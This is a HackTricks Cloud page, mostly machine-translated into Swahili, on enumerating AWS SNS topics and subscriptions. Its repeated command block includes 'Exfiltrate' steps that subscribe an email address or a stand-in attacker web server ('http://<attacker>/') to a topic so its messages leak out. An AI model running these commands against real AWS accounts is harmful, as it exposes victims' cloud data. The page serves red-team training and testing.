AWS - SNS Enum

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SNS

Amazon Simple Notification Service (Amazon SNS) inafafanuliwa kama huduma ya ujumbe inayosimamiwa kikamilifu. Inasaidia aina za mawasiliano kutoka programu hadi programu (A2A) na kutoka programu hadi mtu (A2P).

Vipengele muhimu kwa mawasiliano ya A2A ni pamoja na mekanismu za kuchapisha/kujiunga (pub/sub). Mekanismu hizi zinaanzisha mada, muhimu kwa kuwezesha ujumbe wa kuwasilisha, wa push, wa wengi kwa wengi. Kipengele hiki ni cha faida sana katika hali zinazohusisha mifumo iliyosambazwa, huduma ndogo, na usanifu wa serverless unaotegemea matukio. Kwa kutumia mada hizi, mifumo ya wachapishaji inaweza kusambaza ujumbe kwa ufanisi kwa mifumo mbalimbali ya wapokeaji, ikiruhusu muundo wa ujumbe wa fanout.

Difference with SQS

SQS ni huduma ya mifumo ya foleni inayoruhusu mawasiliano ya pointi hadi pointi, ikihakikisha kwamba ujumbe unachakatwa na mpokeaji mmoja. Inatoa usambazaji angalau mara moja, inasaidia foleni za kawaida na FIFO, na inaruhusu uhifadhi wa ujumbe kwa ajili ya kurudi na usindikaji wa kucheleweshwa. Kwa upande mwingine, SNS ni huduma inayotegemea kuchapisha/kujiunga, ikiruhusu mawasiliano moja hadi wengi kwa kutangaza ujumbe kwa wapokeaji wengi kwa wakati mmoja. Inasaidia nukuu mbalimbali za kujiunga kama barua pepe, SMS, kazi za Lambda, na HTTP/HTTPS, na inatoa mekanismu za kuchuja kwa usambazaji wa ujumbe wa lengo. Ingawa huduma zote mbili zinawezesha kutenganisha kati ya vipengele katika mifumo iliyosambazwa, SQS inazingatia mawasiliano ya foleni, na SNS inasisitiza muundo wa mawasiliano unaotegemea matukio na fan-out.

Enumeration

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Kumbuka kwamba ikiwa mada ni ya aina ya FIFO, ni wanachama pekee wanaotumia itifaki SQS wanaweza kutumika (HTTP au HTTPS haiwezi kutumika).

Pia, hata kama --topic-arn ina eneo hakikisha unataja eneo sahihi katika --region au utapata kosa ambalo linaonekana kuashiria kwamba huna uf access lakini tatizo ni eneo.

Marejeo

https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - SES Enum NextAWS - SQS Enum

Last updated 3 days ago

SNS

Difference with SQS

Enumeration

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Kumbuka kwamba ikiwa mada ni ya aina ya FIFO, ni wanachama pekee wanaotumia itifaki SQS wanaweza kutumika (HTTP au HTTPS haiwezi kutumika).

Pia, hata kama --topic-arn ina eneo hakikisha unataja eneo sahihi katika --region au utapata kosa ambalo linaonekana kuashiria kwamba huna uf access lakini tatizo ni eneo.

Upatikanaji Usio na Uthibitisho

AWS - SNS Unauthenticated Enum

Kuinua Haki

AWS - SNS Privesc

Baada ya Kutekeleza

AWS - SNS Post Exploitation

Kudumu

AWS - SNS Persistence